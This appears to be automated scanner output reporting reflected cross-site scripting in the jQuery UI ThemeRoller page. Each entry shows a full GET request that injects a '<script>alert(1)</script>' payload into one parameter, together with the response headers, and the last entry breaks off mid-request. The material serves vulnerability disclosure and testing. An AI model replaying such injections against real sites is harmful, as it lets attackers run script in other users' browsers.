The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f926f"><script>alert(1)</script>a58c2e437c9 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65f926f"><script>alert(1)</script>a58c2e437c9&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afc9a"><script>alert(1)</script>680b4cdc57f was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10afc9a"><script>alert(1)</script>680b4cdc57f&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dc63"><script>alert(1)</script>f34b1579462 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=756dc63"><script>alert(1)</script>f34b1579462&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1716"><script>alert(1)</script>fd52dd1f0c5 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95a1716"><script>alert(1)</script>fd52dd1f0c5&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ee4"><script>alert(1)</script>ef5a1a6a4b6 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50a7ee4"><script>alert(1)</script>ef5a1a6a4b6&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dad5"><script>alert(1)</script>e93306ce4ce was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=559dad5"><script>alert(1)</script>e93306ce4ce&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85739"><script>alert(1)</script>9382c055b11 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=7585739"><script>alert(1)</script>9382c055b11&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30d95"><script>alert(1)</script>efdfe5adaa9 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=030d95"><script>alert(1)</script>efdfe5adaa9&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 684ec"><script>alert(1)</script>f4d49959a0 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0684ec"><script>alert(1)</script>f4d49959a0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120092
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35da4"><script>alert(1)</script>0aa069f8a2 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png35da4"><script>alert(1)</script>0aa069f8a2&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120027
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d62a"><script>alert(1)</script>d9e2e119da was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png9d62a"><script>alert(1)</script>d9e2e119da&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120027
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887dc"><script>alert(1)</script>2ff81d14d74 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png887dc"><script>alert(1)</script>2ff81d14d74&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120029
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20719"><script>alert(1)</script>34a4ccee6e7 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png20719"><script>alert(1)</script>34a4ccee6e7&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
